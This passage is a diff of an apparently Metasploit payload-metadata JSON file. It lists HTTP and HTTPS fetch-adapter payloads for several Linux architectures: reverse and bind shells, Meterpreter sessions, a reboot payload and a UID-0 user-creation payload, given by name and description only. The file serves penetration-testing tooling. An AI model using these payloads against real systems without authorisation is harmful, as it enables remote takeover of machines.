+    "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/reboot": {
+    "name": "HTTP Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/http/mipsle/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/shell/reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/mipsle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/shell",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/http/mipsle/shell_bind_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/http/mipsle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/shell_reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/mipsle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:49 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:49 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:49 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64/shell_bind_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/http/ppc64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:57 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64",
+    "adapted_refname": "linux/ppc64/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64/shell_find_port": {
+    "name": "HTTP Fetch, Linux Command Shell, Find Port Inline",
+    "fullname": "payload/cmd/linux/http/ppc64/shell_find_port",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTP server.\nSpawn a shell on an established connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:57 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64/shell_find_port",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64",
+    "adapted_refname": "linux/ppc64/shell_find_port",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64/shell_reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/ppc64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:51:57 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64",
+    "adapted_refname": "linux/ppc64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64le/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64le/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/ppc64le/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/http/x64/exec": {
    "name": "HTTP Fetch, Linux Execute Command",
    "fullname": "payload/cmd/linux/http/x64/exec",
@@ -201086,6 +203834,879 @@
    "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6",
    "staged": false
  },
+  "payload_cmd/linux/https/aarch64/meterpreter/reverse_tcp": {
+    "name": "HTTPS Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/meterpreter",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/https/aarch64/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/aarch64/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/aarch64/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/aarch64/shell/reverse_tcp": {
+    "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/aarch64/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/shell",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/https/aarch64/shell_reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/aarch64",
+    "adapted_refname": "linux/aarch64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armbe/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armbe/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armbe/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armbe/shell_bind_tcp": {
+    "name": "HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/https/armbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTPS server.\nListen for a connection and spawn a command shell",
+    "references": [
+      "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armbe",
+    "adapted_refname": "linux/armbe/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/adduser": {
+    "name": "HTTPS Fetch, Linux Add User",
+    "fullname": "payload/cmd/linux/https/armle/adduser",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nCreate a new user with UID 0",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
